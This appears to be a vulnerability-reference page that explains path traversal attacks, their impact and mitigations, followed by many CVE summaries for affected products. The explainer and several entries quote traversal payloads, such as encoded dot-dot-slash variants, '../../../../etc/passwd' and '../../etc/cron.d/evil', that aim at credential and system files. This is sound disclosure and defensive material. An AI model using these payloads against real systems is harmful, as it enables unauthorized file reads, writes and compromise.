Path Traversal
Path traversal exploits occur when applications use user-controlled input to construct file system paths without proper validation.
How It Works
Path traversal exploits occur when applications use user-controlled input to construct file system paths without proper validation. Attackers inject special sequences like ../ (dot-dot-slash) to escape the intended directory and navigate to arbitrary locations in the file system. Each ../ sequence moves up one directory level, allowing an attacker to break out of a restricted folder and access sensitive files elsewhere on the server.
Attackers employ various encoding techniques to bypass basic filters. Simple URL encoding transforms ../ into %2e%2e%2f, while double encoding becomes %252e%252e%252f (encoding the percent sign itself). Other evasion methods include nested sequences like ....// (which become ../ after filter removal), null byte injection (%00 to truncate path validation), and OS-specific path separators (backslashes on Windows). Absolute paths like /etc/passwd may also work if the application doesn't enforce relative path constraints.
The typical attack flow begins with identifying input parameters that reference files—such as file=, path=, template=, or page=. The attacker then tests various traversal payloads to determine if path validation exists and what depth is needed to reach system files. Success means reading configuration files, credentials, source code, or even writing malicious files if the application allows file uploads or modifications.
Impact
- Credential exposure: Access to configuration files containing database passwords, API keys, and authentication tokens
- Source code disclosure: Reading application code reveals business logic, additional vulnerabilities, and hardcoded secrets
- System file access: Retrieving
/etc/passwd,/etc/shadow, or Windows SAM files for credential cracking - Configuration tampering: If write access exists, attackers modify settings or inject malicious code
- Remote code execution: Writing web shells or executable files to web-accessible directories enables full system compromise
Real-World Examples
ZendTo file sharing application (CVE-2025-34508) contained a path traversal vulnerability allowing unauthenticated attackers to read arbitrary files from the server. The flaw existed in file retrieval functionality where user input directly influenced file path construction without adequate validation, exposing sensitive configuration data and potentially system files.
Web application frameworks frequently suffer from path traversal in template rendering engines. When applications allow users to specify template names or include files, insufficient validation permits attackers to read source code from other application modules or framework configuration files, revealing database credentials and session secrets.
File download features in content management systems represent another common vector. Applications that serve user-requested files from disk often fail to restrict paths properly, enabling attackers to download backup files, logs containing sensitive data, or administrative scripts that weren't intended for public access.
Mitigation
- Avoid user input in file paths: Use indirect references like database IDs mapped to filenames on the server side
- Canonicalize and validate: Convert paths to absolute canonical form, then verify they remain within the allowed base directory
- Allowlist permitted files: Maintain an explicit list of accessible files rather than trying to blocklist malicious patterns
- Chroot jails or sandboxing: Restrict application file system access to specific directories at the OS level
- Strip dangerous sequences: Remove
../,..\\, and encoded variants, though this alone is insufficient
Recent CVEs (7723)
Arbitrary file disclosure in Follett Software's Destiny Library Manager (version 22_0_2_rc1) lets remote unauthenticated attackers read system and application files by supplying directory-traversal sequences in the 'image' parameter. Publicly available exploit code exists (a Medium write-up documenting the unauthenticated LFI), and CISA's SSVC framework classifies exploitation as proof-of-concept and automatable, though EPSS remains modest at 0.46% (64th percentile). The flaw is fixed in v.22.5 AU1.
Arbitrary file write on the host in Boxlite sandbox service versions prior to 0.9.0 allows attackers to escape the OCI image extraction root via crafted symlink entries in layer tarballs, enabling remote code execution on the host (typically as root). Exploitation requires a user to pull and load a malicious OCI image distributed through registries such as DockerHub. Publicly available exploit code exists (vendor-published PoC); no public exploit identified in CISA KEV at time of analysis.
Path traversal in the Rust crate onenote_parser (versions before 1.1.1) enables an attacker who supplies a malicious `.onetoc2` notebook table-of-contents file to direct `Parser::parse_notebook` to open arbitrary files on the host filesystem outside the intended notebook directory. While direct content exfiltration is constrained by the parser aborting when a target file fails to parse as a OneNote section, file-existence probing and denial-of-service via large or special files (e.g., named pipes, device nodes) remain viable attack outcomes. No public exploit has been identified and no confirmed active exploitation exists; vendor-released patch version 1.1.1, published 2026-05-15, resolves the issue.
Authenticated remote code execution in Concrete CMS 9.5.0 and earlier allows an administrator with composer form editing privileges to chain a path traversal flaw in the ptComposerFormLayoutSetControlCustomTemplate field with the platform's permissive file uploader to execute arbitrary PHP on the server. The vendor scored this 9.4 (CVSS v4.0) reflecting high confidentiality, integrity, and availability impact across both the vulnerable component and downstream subsequent systems. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.
Path traversal in Mobile Verification Toolkit (MVT) pip/mvt versions through 2026.4.28 allows an adversary who delivers a crafted iOS backup to trigger arbitrary file writes or reads on the analyst's filesystem by embedding directory traversal sequences in fileID values within the backup's Manifest.db SQLite database. The decrypt-backup command can write attacker-controlled content to arbitrary writable paths - enabling shell profile modification or SSH key injection for code execution - while check-backup can read arbitrary host files into MVT's JSON and CSV forensic output. No public exploit has been identified at time of analysis; vendor-released patch v2026.5.12 is available.
Directory traversal in Trend Micro Apex One on-premise server (versions before 14.0.0.17079) enables a highly privileged local attacker to manipulate a key server table and inject malicious code that propagates to all managed endpoint agents, effectively weaponizing the EDR platform's own distribution infrastructure. The attack requires an adversary who has already obtained administrative credentials to the Apex One server through a separate compromise vector. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the changed scope (S:C) in the CVSS vector signals that a successful exploit extends impact beyond the server itself to the entire managed agent fleet.
Remote code execution in the Trend Micro Apex One management console allows attackers with console access to upload malicious files via a path traversal flaw (CWE-22) and execute arbitrary commands on the server. The on-premises product (versions before 14.0.0.14136) is affected, while SaaS deployments have already been remediated by the vendor. No public exploit identified at time of analysis; the issue was responsibly disclosed through the Zero Day Initiative (ZDI-26-137).
Remote code execution in Trend Micro Apex One management console allows attackers with network access to the console to upload malicious files via a path traversal flaw (CWE-22) and execute arbitrary commands on affected installations. The on-premises Apex One 2019 (14.0) prior to 14.0.0.14136 is impacted, while the SaaS variant (below 14.0.20315) has already been mitigated by the vendor; no public exploit identified at time of analysis, though it was reported through the Zero Day Initiative.
Privilege escalation via path traversal in Mattermost collaboration platform allows authenticated users to invoke arbitrary internal APIs using the system administrator's auth token by manipulating integration action URLs. Affected branches include 11.6.x, 11.5.x, 11.4.x, and 10.11.x, with no public exploit identified at time of analysis. CVSS 8.0 reflects high impact across confidentiality, integrity, and availability despite high attack complexity and required user interaction.
Path traversal via extended attribute (ea) handling in Netatalk 2.1.0 through 4.4.2 allows authenticated remote attackers to access or modify files outside intended directories on AFP file shares. The flaw stems from incomplete input sanitization on the ea code path and is resolved in 4.4.3. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Path traversal in Frappe Learning Management System (LMS) versions 2.50.0 and below allows authenticated users with course-editing privileges to write arbitrary files outside the intended upload directory by uploading a maliciously crafted SCORM ZIP package. The CVSS 4.0 base score of 9.4 reflects high impact across confidentiality, integrity, and availability with scope change to subsequent systems, though exploitation requires low-privileged authentication. No public exploit identified at time of analysis.
Arbitrary file read in the Frappe full-stack web application framework allows remote unauthenticated attackers to retrieve files outside intended directories via path traversal sequences in affected versions prior to 15.105.0 and 16.15.0. The CVSS 4.0 base score of 8.7 reflects high confidentiality impact with no required privileges or user interaction, though no public exploit identified at time of analysis and the issue is not listed in CISA KEV. Successful exploitation discloses sensitive server-side files such as configuration secrets, site keys, or credentials used by downstream ERPNext deployments.
Path traversal in XWiki Platform allows unauthenticated remote attackers to read arbitrary files on the server, including sensitive configuration like WEB-INF/xwiki.cfg, by abusing the resource parameter of the ssx and jsx endpoints with leading-slash prefixes. The CVSS 4.0 base score of 9.3 reflects network-reachable, no-privilege exploitation with high impact to confidentiality, integrity, and availability of the vulnerable component. No public exploit identified at time of analysis, though the GitHub Security Advisory includes a working URL pattern that effectively demonstrates the issue.
Arbitrary file read in Altium Enterprise Server on-premise deployments allows any authenticated low-privilege user to escape the configured storage root via URL-encoded absolute paths in the Viewer StorageController API, exposing the master configuration containing database credentials, signing keys, certificate passwords, and OAuth secrets. The CVSS 4.0 base score of 9.4 reflects scope change to confidential information enabling full server takeover; no public exploit identified at time of analysis, but the vendor (Altium) has released a fix and cloud-hosted tenants are unaffected because they do not use the local filesystem storage component.
Arbitrary file write in Altium Enterprise Server ComparisonService allows authenticated workspace users to escape the temporary upload directory and plant files anywhere on the host filesystem via crafted multipart Content-Disposition headers in the Gerber upload APIs. The flaw (CVSS 4.0 score 9.4, CWE-22) escalates to remote code execution by dropping payloads into web-accessible paths or overwriting service binaries, and a vendor patch is available. No public exploit identified at time of analysis.
Path traversal in NVIDIA BioNeMo Core for Linux allows remote attackers to escape intended directory boundaries when a user is induced to load a malicious file, enabling code execution, information disclosure, data tampering, or denial of service. The flaw carries a high CVSS score of 8.8 driven by network reachability and full CIA impact, though exploitation requires user interaction; no public exploit identified at time of analysis.
Denial of service in NVIDIA Triton Inference Server can be triggered remotely without authentication via a path traversal flaw (CWE-22), enabling unauthenticated network attackers to disrupt model-serving availability. The CVSS 7.5 score reflects high availability impact with no confidentiality or integrity loss, and no public exploit has been identified at time of analysis.
Path traversal exploitation in NVIDIA Triton Inference Server enables unauthenticated remote attackers to cause denial of service by submitting crafted requests containing malicious path components. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms zero authentication or user interaction is required, making this broadly reachable from the network with low attack complexity. No public exploit code has been identified and the vulnerability is not listed in the CISA KEV catalog at time of analysis; however, the no-prerequisite attack profile warrants patching per NVIDIA's advisory at nvidia.custhelp.com.
Path traversal via the attachment upload API in Trilium Notes 0.102.1 and prior allows an authenticated high-privilege attacker to read arbitrary files from the server's filesystem by supplying a controlled file path in a POST request body. The two-step exploitation pattern - POST to /api/attachments/{attachmentId}/upload-modified-file to stage a file, then GET from /api/attachments/{attachmentId}/download to retrieve its contents - effectively turns the attachment system into an unauthenticated file disclosure proxy once the initial write is performed. The CVSS Changed scope (S:C) reflects that exposed materials such as SSH keys, database credentials, and application configs can cascade into compromise of co-hosted services well beyond Trilium itself. No public exploit or CISA KEV listing has been identified at time of analysis.
Path traversal in pymdownx.snippets versions 10.0.1 through 10.21.2 allows unauthenticated remote attackers to read arbitrary files from sibling directories outside the configured base_path, bypassing the restrict_base_path protection intended by CVE-2023-32309. The bypass exploits a string-prefix comparison introduced in PR #2039 that lacks directory-boundary enforcement, enabling a crafted snippet directive like '--8<-- "../docs_secret/leak.txt"' to escape the configured base directory when sibling paths share the same string prefix. Publicly available exploit code (proof-of-concept) exists in the GitHub Security Advisory; the vulnerability is not confirmed actively exploited in the CISA KEV catalog at time of analysis.
Unauthenticated path traversal in AVideo's `view/img/image404Raw.php` allows any remote attacker to read arbitrary image files accessible to the PHP process, bypassing all application-layer ACLs that normally gate private user photos, admin thumbnails, and encrypted-video poster frames. The vulnerability affects all versions through the current master branch (commit 0dbadbcaaa1b415c7db078a72dc4b26d9fac0485) and all releases up to and including 29.0 (pkg:composer/wwbn_avideo). No vendor-released patch is currently available, and a working proof-of-concept is publicly disclosed in GHSA-w4qq-74h6-58wq, making this immediately actionable by any unauthenticated attacker with HTTP access to the deployment.
Arbitrary file write via path traversal in Mailpit's `dump --http` subcommand (versions < 1.30.0) allows any HTTP server impersonating a Mailpit instance to write attacker-controlled bytes to arbitrary paths outside the intended output directory. The attacker controls both the file path (via the message ID field in the JSON response) and the file contents (via the raw message body endpoint), enabling writes anywhere the dumping user has write permission - including cron jobs, shell startup files, and CI artifact directories. Publicly available exploit code exists (Python PoC published in GHSA-qx5x-85p8-vg4j); no confirmed active exploitation at time of analysis.
Directory traversal in openziti zrok's drive sync pipeline allows a malicious WebDAV/zrok share operator to write files outside the victim's chosen destination when the victim runs 'zrok2 copy'. Because the sync code trusts the server-supplied DAV 'href' (e.g. '/../outside.txt') and joins it to the local target root before calling FilesystemTarget.WriteStream, a hostile share can overwrite sensitive files anywhere the copying user's credentials permit. No public exploit identified at time of analysis and EPSS is low (0.06%), but the vendor has shipped a fix (v2.0.3) and the root cause is confirmed in the commit diff.
Path traversal in go-git allows crafted repository payloads to write files outside the intended checkout directory, including into the repository's .git directory and parent paths. The vulnerability stems from go-git failing to implement path validation checks that upstream Git adopted years ago, creating a drift-induced security gap across all supported platforms - with additional platform-specific attack vectors affecting Windows and macOS users distinctly. CVSS scores this at 5.4 medium with no public exploit identified at time of analysis and no CISA KEV listing, but the real-world risk is elevated in automated pipelines or developer tooling that processes untrusted repositories without human review.
Server-side request forgery in the zrok Python SDK ProxyShare (pip/zrok 0.4.47 through 1.1.11) lets any viewer of a share coerce the proxy host into requesting arbitrary internal or loopback services and returns the response to the attacker. Because the Flask handler forwards the client-supplied path through urllib.parse.urljoin, an absolute URL in the request path overrides the share owner's fixed target host. No public exploit has been identified at time of analysis and EPSS is low (0.06%), but the CVSS 4.0 base score is 9.9 given unauthenticated network reach.
Path traversal in the TYPO3 'Faceted Search' extension's file indexer exposes arbitrary server filesystem content to high-privileged backend users. Because the indexer does not normalize or canonicalize the configured directory path before use, a backend user holding the specific permission to edit indexer configurations can supply path traversal sequences to redirect indexing at sensitive locations outside the intended document root. The CVSS 4.0 score of 5.9 (Medium) reflects high confidentiality impact (VC:H) constrained by the requirement for high privileges (PR:H). No public exploit or CISA KEV listing exists at time of analysis.
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue.
An authentication bypass vulnerability exists in the embedded HTTP server of Panabit PAP-XM320 up to and including v7.7. The server validates session cookies using a filesystem existence check based on a user-controlled cookie value without proper sanitization, allowing directory traversal and bypass of authentication.
An issue in gohttp commit 34ea51 allows attackers to execute a directory traversal via supplying a crafted request.
Log-volume denial of service in NiceGUI's dynamic static-asset routes allows remote unauthenticated attackers to flood server logs and exhaust disk or log-pipeline capacity. The two affected routes - the per-component resource route (introduced in v1.4.6) and the ESM module route (introduced in v3.0.0) - fail to distinguish directories from files before passing user-controlled paths to Starlette's FileResponse, triggering an unhandled RuntimeError that Uvicorn logs as a full multi-frame traceback (~100 lines per request). Versions up to and including 3.11.1 are affected; the fix is available in 3.12.0. No public exploit or CISA KEV listing has been identified at time of analysis. IMPORTANT: The provided tags (RCE, Path Traversal, Information Disclosure) are directly contradicted by the advisory, which explicitly states there is no remote code execution, no path traversal, and no data exposure - these tags should be treated as erroneous metadata.
Path traversal in Claude HUD through version 0.0.12 permits local low-privileged attackers to read arbitrary files by supplying a crafted `transcript_path` value via stdin JSON, bypassing all path validation. Beyond direct file read access, the application writes file metadata - including the accessed paths - to a persistent cache file with insufficiently restrictive permissions, leaving a forensic record readable by other local users that survives process termination. No public exploit code has been identified at time of analysis; CVSS 4.0 scores this 4.8 (Medium) reflecting local-only reach, and a vendor patch is available at commit 234d9aa.
Authenticated arbitrary file read in WWBN/AVideo's view/update.php exposes any text file readable by the web-server process to admin-level users via path traversal. The $_POST['updateFile'] parameter is concatenated directly into a filesystem path under updatedb/ without sanitization, allowing an authenticated administrator to supply sequences like '../../../../etc/passwd' and have PHP's file() function return the contents line-by-line in the migration-runner HTML response. A proof-of-concept exploit is publicly documented in GitHub Security Advisory GHSA-3mjv-375j-6h92; no patched release has been issued for any version through 29.0 as of analysis time, and no public exploit identified at time of analysis as actively exploited by CISA KEV.
Path traversal in steipete/summarize prior to 0.15.1 lets authenticated callers of the /v1/summarize daemon endpoint write slide_*.png and slides.json files to arbitrary directories by supplying an absolute path or traversal sequences in the slidesDir parameter, and subsequently delete matching files via repeat extraction. The flaw, reported by VulnCheck and patched in v0.15.2, enables file write and limited destructive impact across the filesystem; no public exploit identified at time of analysis.
Arbitrary file deletion in DumbAssets through 1.0.11 lets unauthenticated remote attackers destroy any file the Node.js process can write to by submitting `../` sequences in the `filesToDelete` array of the `POST /api/delete-file` endpoint. Because authentication on the application is optional and disabled by default, exposed instances can be rendered completely non-functional by deleting critical files such as `server.js` or `package.json`. No public exploit identified at time of analysis, and the CVE is not currently on the CISA KEV list.
Arbitrary directory deletion in CloakBrowser's cloakserve CDP multiplexer (pip package cloakbrowser <= 0.3.27) allows unauthenticated network attackers to delete directories accessible to the service user by supplying path traversal sequences in the fingerprint query parameter. The service binds to 0.0.0.0 by default, dramatically widening exposure, and no public exploit identified at time of analysis though the vulnerability is trivially reproducible from the published advisory.
Prototype pollution in the npm package parse-nested-form-data version 1.0.0 and earlier allows unauthenticated remote clients to mutate Object.prototype of the running Node.js process by submitting a FormData field whose name contains __proto__ in bracket or dot notation. The flaw resides in handlePathPart in src/index.ts, which walks nested path segments without filtering reserved keys, so a single crafted field name pollutes the prototype chain of every plain object in the process. No public exploit identified at time of analysis, but a working proof-of-concept is published in the GHSA advisory itself.
OS command injection in the Arcane backend volume browser endpoint (all versions ≤ 1.18.1) allows any authenticated user - including non-admin roles - to execute arbitrary shell commands inside the per-volume helper container by supplying Bourne shell metacharacters such as `$()` in the `path` query parameter of `GET /environments/{id}/volumes/{volumeName}/browse`. The path sanitizer at `volume_service.go:1448-1467` blocks only `../` traversal and passes shell substitution sequences through unchanged; `strconv.Quote` wraps the path in Go-style double quotes, which POSIX `sh` still interprets as a command-substitutable string, causing the injected command to execute and its output to be reflected in the HTTP 500 error body. No vendor-released patch exists at time of analysis; publicly available exploit code is embedded in the GHSA advisory (GHSA-9mvm-4gwg-v8mp) and no confirmed active exploitation (CISA KEV) has been reported.
Path traversal in Dify versions 0 through 1.14.1 allows authenticated tenants to escape their authorized tenant path and reach the Plugin Daemon's internal REST API, including debug interfaces, by smuggling unencoded dot sequences through task identifiers or filename parameters. Because Dify Cloud permits unauthenticated free self-registration, the authentication barrier collapses to trivial account creation, and publicly available exploit code exists; the attacker only needs the victim tenant's UUID to pivot. CVSS 4.0 is rated 9.2 with high confidentiality and integrity impact.
SGLangs multimodal generation runtime is vulnerable to an unauthenticated path traversal vulnerability, allowing an attacker to write arbitrary files anywhere the server process has write access, by including ../ sequences in the upload filename when sent to specific endpoints.
Path traversal in opensourcepos Open Source Point of Sale versions 3.4.0 through 3.4.2 allows authenticated remote attackers to read arbitrary image files outside the intended directory via manipulated pic_filename parameters in the getPicThumb controller function. The vulnerability has CVSS 5.3 (Medium) with low attack complexity requiring only low-privilege authentication. Vendor-released patch available via GitHub commit def0c27a0e252668df8d942fc31e16d1edfd7323. No public exploit or active exploitation confirmed at time of analysis, though the fix is publicly documented with code diff showing the vulnerable parameter handling.
The WP Maps WordPress plugin before 4.9.3 does not properly sanitize a parameter before using it in a file path, allowing authenticated users to perform Local File Inclusion attacks.
Arbitrary file disclosure in HSC MailInspector v5.3.3-7 allows unauthenticated remote attackers to read sensitive files from the host via a path traversal flaw in the exposed /vendor/phpunit/phpunit.php endpoint. The CVSS 7.5 rating reflects high confidentiality impact with no required privileges or user interaction, though EPSS remains very low at 0.05% (15th percentile) and there is no public exploit identified at time of analysis. The exposure of a PHPUnit development artifact in a production path mirrors a long-standing class of PHP supply-chain misconfigurations.
Unauthenticated path traversal in HSC MailInspector 5.3.3-7 allows remote attackers to read arbitrary files from the underlying operating system by manipulating the 'text' parameter of the /tap/dw.php endpoint. Public exploit details are disclosed on GitHub (sql3t0/cve-disclosures), though EPSS probability remains low (0.05%) and the issue is not currently listed in CISA KEV. The flaw enables disclosure of sensitive system files such as configuration files, credentials, and mail-related data without prior authentication.
Path traversal in Continue 1.2.22 and earlier allows local authenticated attackers to read arbitrary files on the host system via crafted dirPath parameters to the lsTool function in the JSON-RPC server. The vulnerability has a publicly available exploit (GitHub Gist) but CVSS base score of 3.3 (Low) reflects limited impact due to local access requirement, low privilege requirement, and confidentiality-only impact with no integrity or availability consequences. EPSS data unavailable; not listed in CISA KEV, indicating no confirmed widespread exploitation.
Path traversal in Kilo-Org kilocode's File Diff API Endpoint allows authenticated remote attackers to read arbitrary files outside intended directories. Affecting versions up to 7.0.47, the vulnerability exploits insufficient validation of file path arguments in the Bun.file function within the worktree-diff component. Public exploit code exists (EPSS probability and KEV status not provided), and the vendor has not responded to disclosure attempts, leaving users without vendor-confirmed remediation guidance.
Path traversal in fishaudio Bert-VITS2's Gradio web interface allows remote unauthenticated attackers to read or write arbitrary files on the server filesystem via the generate_config function's data_dir parameter. Public exploit code exists (disclosed via VulDB and GitHub Gist). EPSS data unavailable; CVSS 5.5 (Medium) but CVSS 4.0 vector shows network-accessible, no authentication required (AV:N/PR:N), making this readily exploitable against any internet-exposed instance. Vendor non-responsive to early disclosure attempt, indicating no official patch available.
Path traversal in fishaudio Bert-VITS2's hiyoriUI.py allows unauthenticated remote attackers to access arbitrary files outside the intended model directory via the _get_all_models function. Public exploit code exists (GitHub Gist). The project uses rolling releases with no versioned patches, and the vendor has not responded to disclosure attempts. EPSS data unavailable; not listed in CISA KEV, suggesting limited real-world exploitation despite public POC.
Path traversal in adenhq Hive versions up to 0.11.0 allows unauthenticated remote attackers to read arbitrary files via the _read_events_tail function in the Delete Request Handler. This network-accessible vulnerability requires no user interaction and has a publicly available proof-of-concept exploit. The vendor has not responded to disclosure attempts, leaving users without an official patch. EPSS data unavailable; CVSS 5.5 reflects limited confidentiality/integrity impact but ease of exploitation warrants prioritization for internet-facing deployments.
Path traversal in AstrBot dashboard file upload allows authenticated remote attackers to write files outside intended directories via manipulated filenames. Affected versions through 4.23.5 fail to sanitize user-supplied filenames in the post_file function, enabling directory traversal sequences (../, ..\ ) to bypass access controls. Publicly available exploit code exists (GitHub Gist by YLChen-007). Vendor-released patch in version 4.23.6 implements filename sanitization using PurePosixPath normalization and path validation to prevent traversal. CVE assigned CVSS 6.3 (Medium) with low-privilege remote exploitation confirmed. No CISA KEV listing indicates exploitation remains targeted rather than widespread.
Google Drive for WordPress 2.2 contains a path traversal vulnerability that allows unauthenticated attackers to read arbitrary files by injecting directory traversal sequences in the file_name. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Woocommerce CSV Importer 3.3.6 contains a path traversal vulnerability that allows any registered user to delete arbitrary files by submitting unescaped filenames through the delete_export_file AJAX. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Path traversal in Oinone Pamirs versions up to 7.2.0 allows authenticated local attackers with physical device access to read, write, or delete arbitrary files via manipulated uniqueFileName parameter in LocalFileClient.java RestController endpoint. Publicly available exploit code exists (GitHub POC published). Despite low CVSS 4.0 score (0.9), the physical access requirement and low attack complexity make this exploitable in scenarios where attackers have direct device access or console privileges. EPSS data not available for this CVE. Vendor unresponsive to disclosure.
ProcessMaker 3.5.4 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting improper path traversal validation. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 contains a directory traversal vulnerability that allows unauthenticated attackers to read arbitrary files by manipulating the. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Home Assistant Community Store (HACS) 1.10.0 contains a path traversal vulnerability that allows unauthenticated attackers to read sensitive files by traversing directories via the /hacsfiles/. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
WordPress Plugin Backup and Restore 1.0.3 contains an arbitrary file deletion vulnerability that allows authenticated attackers to delete files by manipulating parameters in AJAX requests. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Supsystic Backup 2.3.9 contains a local file inclusion vulnerability that allows unauthenticated attackers to read and delete arbitrary files by manipulating the download path parameter. Rated medium severity (CVSS 6.9), this vulnerability is no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Supsystic Digital Publications 1.6.9 contains a path traversal vulnerability in the Folder input field that allows attackers to access files outside the web root by injecting directory traversal. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
File overwrite and information disclosure in Crypt::DSA through version 1.19 for Perl expose systems where user-controlled input reaches the library's key handling routines. The root cause is use of Perl's 2-argument open() form in lib/Crypt/DSA/Key.pm, which interprets leading or trailing special characters in filenames as I/O mode specifiers, enabling reads from or writes to arbitrary files. CVSS rates this AV:N/AC:L/PR:N/UI:N (Medium, 6.5), though actual exposure depends on application-level code paths; EPSS is 0.01% and this CVE is not in CISA KEV, indicating no public exploit identified at time of analysis.
Arbitrary directory deletion in phpMyFAQ before 4.1.2 allows authenticated admins with the INSTANCE_DELETE permission to recursively delete directories outside the multisite clientFolder by submitting path traversal sequences in the client URL parameter. The flaw stems from Client::deleteClientFolder() stripping only the https:// scheme without canonicalizing or validating ../ segments before passing the path to Filesystem::deleteDirectory(). Publicly available exploit code exists (VulnCheck advisory and GHSA write-up include a PoC), though EPSS remains low at 0.04% and the issue is not listed in CISA KEV.
Path traversal in SimpleSAMLphp's CAS server module allows unauthenticated remote attackers to read and deserialize arbitrary files outside the ticket directory via crafted ticket parameters. When using FileSystemTicketStore, attackers can inject '../' sequences into CAS validation endpoints to escape the configured directory, potentially deleting files that contain serialized PHP data compatible with array types. The vulnerability has a CVSS score of 8.6 with no public exploits identified at time of analysis.
Path traversal in Pipecat's development runner allows unauthenticated remote attackers to read arbitrary files when the --folder flag is used. The /files/{filename:path} endpoint fails to validate paths containing %2F-encoded directory separators, bypassing Starlette's URL normalization. Fixed in version 1.2.0 with no public exploit identified at time of analysis.
Path traversal vulnerability in Joplin's OneNote importer (versions 3.2.2 through 3.5.6) allows local attackers with authenticated access to overwrite arbitrary files on disk by importing malicious .one files containing directory traversal sequences in embedded file names. The vulnerability can lead to remote code execution by overwriting system files like .bashrc. Publicly available exploit code exists, with vendor-released patch available in version 3.5.7.
Archive extraction boundary failure in Microsoft APM's legacy-bundle probe allows local attackers to overwrite arbitrary files on Windows systems running Python 3.10 or 3.11. When users run 'apm install' on a malicious .tar.gz file, untrusted tar members bypass path validation, enabling absolute path writes (e.g., D:/...) that compromise system integrity. Fixed in version 0.13.0. No active exploitation confirmed at time of analysis, but the local attack vector with user interaction required (CVSS AV:L/UI:R) limits real-world risk to social engineering scenarios targeting AI agent developers on Windows platforms.
Path traversal in DHTMLX PDF Export Module (used by Gantt and Scheduler) allows remote unauthenticated attackers to read arbitrary local files from the server and embed them in generated PDFs. The vulnerability stems from insufficient HTML sanitization in the module's PDF generation process. CERT-PL reported this issue, and DHTMLX released version 0.7.6 to address it. No active exploitation confirmed by CISA KEV, but the low attack complexity and network attack vector make this a priority for organizations using affected Gantt or Scheduler deployments.
Path traversal in DHTMLX Diagram's export module allows remote unauthenticated attackers to exfiltrate local server files through crafted HTML payloads in the src attribute. The vulnerability exposes high-value server-side information (CVSS VC:H, SC:H) by embedding local files into generated PDFs without requiring authentication (PR:N) or user interaction (UI:N). DHTMLX released a fix in version 1.1.1, confirmed by CERT-PL advisory and vendor changelog.
Remote unauthenticated attackers can exploit a path traversal vulnerability in Quick Playground plugin for WordPress (versions ≤1.3.3) to exfiltrate sensitive server files including wp-config.php credentials. The flaw in the qckply_zip_theme() function allows arbitrary filesystem traversal via an unsanitized 'stylesheet' parameter, triggering creation of downloadable ZIP archives containing any server-accessible files. With CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicating trivial remote exploitation requiring no authentication, this represents an immediate confidentiality risk for all sites running affected versions, though no CISA KEV listing or public exploit code has been identified at time of analysis.
Path traversal in OneDev Git server allows authenticated users with repository push permissions to read arbitrary files accessible to the server process. The vulnerability exploits improper validation of repository-controlled LFS (Large File Storage) metadata to break expected path boundaries, enabling file reads outside intended repository storage. A vendor-released patch is available in version 15.0.2. CVSS 7.1 reflects high confidentiality impact via network-based attack with low complexity requiring only low-privilege authentication.
Path traversal vulnerabilities in go-billy (Go filesystem abstraction library) allow authenticated attackers with network access to escape intended directory boundaries and access arbitrary filesystem locations. The vulnerability affects all versions prior to v5.9.0 and v6.0.0-alpha.1, with the osfs.ChrootOS implementation particularly impacted due to insufficient path sanitization of dot-dot-slash sequences. Applications using go-billy for filesystem isolation are at risk of unauthorized file access. Vendor has released patches in v5.9.0 and v6.0.0-alpha.1, with ChrootOS deprecated in v5 and removed in v6 in favor of the new BoundOS implementation backed by Go's traversal-resistant os.Root primitive. No public exploit identified at time of analysis, but CVSS 8.1 reflects high confidentiality and integrity impact.
Path traversal in Pode PowerShell web framework versions 2.4.0 through 2.12.x allows high-privileged authenticated users to read arbitrary files from the server filesystem via crafted static route requests. An attacker with high privilege can request paths like http://localhost:8080/c:/Windows/System32/drivers/etc/hosts to retrieve sensitive file contents. The vulnerability is fixed in version 2.13.0.
Path traversal in Portainer's backup restore feature allows arbitrary file write to the server filesystem via crafted tar.gz archives. Versions prior to 2.39.0 (and 2.33.8 in the LTS branch) use unsafe path joining in the ExtractTarGz function, permitting entries like `../../etc/cron.d/evil` to escape the extraction root. An authenticated administrator who restores a malicious archive or whose credentials are compromised can write files to any path accessible to the Portainer process, potentially establishing persistence on the host. Exploitation requires administrative privileges within Portainer, reducing practical impact.
Path traversal in STIGQter 0.1.2 through 1.2.6 allows local code execution when users open malicious .stigqter files and explicitly run the 'Export HTML' action. The CWE-22 path traversal flaw enables attackers to write arbitrary files with the victim's privileges, achieving code execution. User interaction is mandatory - victims must both open a crafted file and trigger the specific export function. No public exploit code or active exploitation has been identified at time of analysis, though the attack path is straightforward for targeted social engineering. Fixed in version 1.2.7 per vendor advisory.
